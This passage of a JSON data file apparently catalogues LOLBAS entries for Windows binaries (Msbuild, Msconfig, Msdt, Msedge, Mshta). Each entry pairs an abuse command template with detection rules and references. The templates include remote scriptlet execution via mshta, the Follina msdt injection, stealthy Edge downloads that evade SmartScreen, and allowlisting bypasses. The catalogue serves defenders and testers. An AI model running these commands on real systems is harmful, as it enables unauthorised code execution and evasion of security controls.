workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:3","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe {PATH:.proj}","description":"Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.","usecase":"Execute project file that contains XslTransformation tag parameters","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:4","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe @{PATH:.rsp}","description":"By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msconfig-exe:0","toolId":"lolbas:msconfig-exe","toolName":"Msconfig.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Msconfig.exe -5","description":"Executes command embeded in crafted c:\\windows\\system32\\mscfgtlc.xml.","usecase":"Code execution using Msconfig.exe","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\msconfig.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml"},{"type":"IOC","value":"mscfgtlc.xml changes in system32 folder"}],"references":["https://twitter.com/pabraeken/status/991314564896690177","https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdt-exe:0","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE","description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.","usecase":"Execute code","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdt-exe:1","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE","description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.","usecase":"Execute code bypass Application whitelisting","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdt-exe:2","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdt.exe /id PCWDiagnostic /skip force /param \"IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe\"","description":"Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the \"PCWDiagnostic\" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","usecase":"Execute code bypass Application allowlisting","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedge-exe:0","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msedge.exe {REMOTEURL:.exe.txt}","description":"Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedge-exe:1","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"{REMOTEURL:.base64.html}\" > {PATH:.b64}","description":"Edge will silently download the file. File extension should be .html and binaries should be encoded.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedge-exe:2","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedge.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:0","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe {PATH:.hta}","description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:1","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe vbscript:Close(Execute(\"GetObject(\"\"script:{REMOTEURL:.sct}\"\")\"))","description":"Executes VBScript supplied as a command line argument.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:2","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe javascript:a=GetObject(\"script:{REMOTEURL:.sct}\").Exec();close();","description":"Executes JavaScript supplied as a command line argument.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/s